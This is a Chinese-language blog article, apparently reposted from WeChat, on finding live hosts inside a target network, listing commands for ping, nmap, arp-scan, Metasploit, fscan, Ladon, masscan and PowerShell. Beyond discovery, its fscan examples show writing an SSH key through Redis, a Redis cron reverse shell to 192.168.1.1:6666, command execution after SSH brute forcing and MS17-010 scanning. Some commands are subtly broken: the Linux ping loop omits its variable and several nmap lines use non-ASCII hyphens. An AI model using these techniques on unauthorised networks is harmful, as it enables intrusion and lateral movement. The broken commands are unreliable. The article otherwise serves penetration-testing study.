内网存活主机探测的一些方法

  • A+
所属分类:安全文章

内网存活主机探测的一些方法

只提供思路,部分工具动静太大 不建议直接在真实内网环境使用!


1.Linux使用ping探测存活主机:

for k in $( seq 1 255);do ping -c 1 192.168.7.|grep "ttl"|awk -F "[ :]+" '{print $4}'; done

2.Windows使用ping探测存活主机:

for /l %i in (1,1,255) do @ping 192.168.7.%i -w 1 -n 1|find /i "ttl="

3.使用nmap探测存活主机:

ARP 扫描:nmap -PR -sn 192.168.7.0/24ICMP 扫描:nmap ‐sP ‐PI 192.168.7.0/24 ‐T4ICMP 扫描:nmap ‐sn ‐PE ‐T4 192.168.7.0/24SNMP 扫描:nmap -sU --script snmp-brute 192.168.7.0/24 -T4UDP 扫描:nmap -sU -T5 -sV --max-retries 1 192.168.7.7 -p 500NetBIOS 扫描:nmap --script nbstat.nse -sU -p137 192.168.7.0/24 -T4SMB 扫描:nmap ‐sU ‐sS ‐‐script smb‐enum‐shares.nse ‐p 445 192.168.7.0/24

4.Windows使用arp-scan探测存活主机:

arp-scan.exe -t 10.30.3.1/24

工具下载地址:Github arp-scan download

5.使用Metasploit探测存活主机:

auxiliary/scanner/discovery/udp_probeauxiliary/scanner/discovery/udp_sweepauxiliary/scanner/discovery/arp_sweepauxiliary/scanner/netbios/nbnameauxiliary/scanner/snmp/snmp_enumauxiliary/scanner/smb/smb_version

6.使用fscan探测存活主机:

fscan -h 192.168.1.1/24fscan.exe -h 192.168.1.1/24  (默认使用全部模块)fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写私钥)fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)

工具下载地址:Fscan 一款内网扫描工具,方便一键大保健

7.使用Ladon探测存活主机:

Ladon默认扫描通过ICMP探测存活IP,再加载模块,大部份内网代理工具并不支持ICMP协议。或目标大量机器存在防火墙或禁Ping,这种情况下需要Ladon功能扫描内网则需加nocheck
命令: Ladon nocheck命令: Ladon nocheck 扫描参数例子: Ladon nocheck MS17010命令: Ladon nocheck IP/URL/IP段 扫描参数例子: Ladon nocheck 192.168.1.8/24 MS17010

工具下载地址:Ladon 大型网络渗透的多线程插件化综合扫描神器

8.使用tcping探测存活主机:

tcping.exe -n 1 192.168.7.7 445
Probing 192.168.7.7:445/tcp - Port is open - time=1.719msPing statistics for 192.168.7.7:445 1 probes sent. 1 successful, 0 failed. (0.00% fail)Approximate trip times in milli-seconds: Minimum = 1.719ms, Maximum = 1.719ms, Average = 1.719ms

工具下载地址:download tcping

9.使用masscan探测存活主机:

masscan --ping 192.168.123.1/24 --rate 1000000masscan -p80,8080-8100 10.0.0.0/8

工具下载地址:download masscan

10.nbtscan 存活探测:

nbtscan.exe -m 192.168.1.1/24nbtscan -r 192.168.1.1/24

工具下载地址:download nbtscan

11.PowerShell 存活探测:

powershell.exe -exec bypass -Command "Import-Module .arpscan.ps1;InvokeARPScan -CIDR 192.168.1.0/24"powershell.exe ‐exec bypass ‐Command "Import‐Module ./Invoke‐TSPingSweep.ps1; Invoke‐TSPingSweep ‐StartAddress 192.168.1.1 ‐EndAddress 192.168.1.254 ‐ResolveHost ‐ScanPort ‐Port 445,135"



往期精彩


登陆页面的检测及渗透

渗透实战篇(一)

渗透测试信息收集的方法

常见Web中间件漏洞利用及修复方法

内网渗透 | 流量转发场景测试

Waf从入门到Bypass

实战渗透-看我如何拿下学校的大屏幕

技术篇:bulldog水平垂直越权+命令执行+提权

渗透工具实战技巧大合集 | 先收藏点赞再转发一气呵成


内网存活主机探测的一些方法

感兴趣的可以点个关注!!!

内网存活主机探测的一些方法

关注「安全先师」
把握前沿安全脉搏



本文始发于微信公众号(安全先师):内网存活主机探测的一些方法

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: